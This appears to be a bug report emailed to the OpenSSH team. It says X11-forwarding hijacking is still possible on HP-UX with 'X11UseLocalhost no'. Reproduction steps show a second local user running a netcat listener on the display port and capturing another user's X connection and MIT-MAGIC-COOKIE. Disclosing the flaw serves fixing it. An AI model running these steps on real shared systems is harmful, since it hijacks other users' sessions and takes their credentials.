"possible hijacking of X11-forwarded connections" bug has not been fixed completely

[施威]

leanneHi OpenSSH team,
 
I am still able to reproduce this problem with openssh50 code both on hpux.
Seems like OpenSSH didn't fix this problem completely.
 
how to reproduce:
 
1. root at sshpa4# uname -aHP-UX sshpa4 B.11.23 U 9000/800 3267743753 unlimited-user license
2. sshd_config
X11Forwarding yesX11DisplayOffset 10X11UseLocalhost no                // must not use "yes" to bind to localhost
3. /opt/ssh/sbin/sshd
 
4. log to sshpa4 from another terminal with normal user "sway" and start "nc"
sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s sshpa4.chn.hp.comlistening on [16.157.129.223] 6010 ...
5. logon to sshpa4 with another "leanne" with X11 forwarding
leanne at sshpa4# echo $DISPLAY16.157.129.223:10.0
leanne at sshpa4# netstat -an|grep 6010tcp        0      0  16.157.129.223.6010    *.*                     LISTENtcp        0      0  *.6010                 *.*                     LISTENtcp        0      0  *.6010                 *.*                     LISTENtcp        0      0  *.6010                 *.*                     LISTEN
6. user sway2 starts any X program will end with being hijacked by user "sway"
leanne at sshpa4# xclock
7. hijacked by user "sway"
 
sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s sshpa4.chn.hp.comlistening on [16.157.129.223] 6010 ...connect to [16.157.129.223] from sshpa4.chn.hp.com [16.157.129.223] 54765B MIT-MAGIC-COOKIE-1Öbs«¨¼ÓŠG‘‘›!ƒÂ
 
 
I found that this problem could only happen when the "X11UseLocalhost no" is set in the sshd_config.
 
I checked the code, found that there might be something wrong with the "channel_set_reuseaddr(sock);" function which is called in the function x11_create_display_inet in file channels.c
 
Can someone check this out for me , thanks. 
 
 
 
 
_________________________________________________________________
用手机MSN聊天写邮件看空间，无限沟通，分享精彩！
http://mobile.msn.com.cn/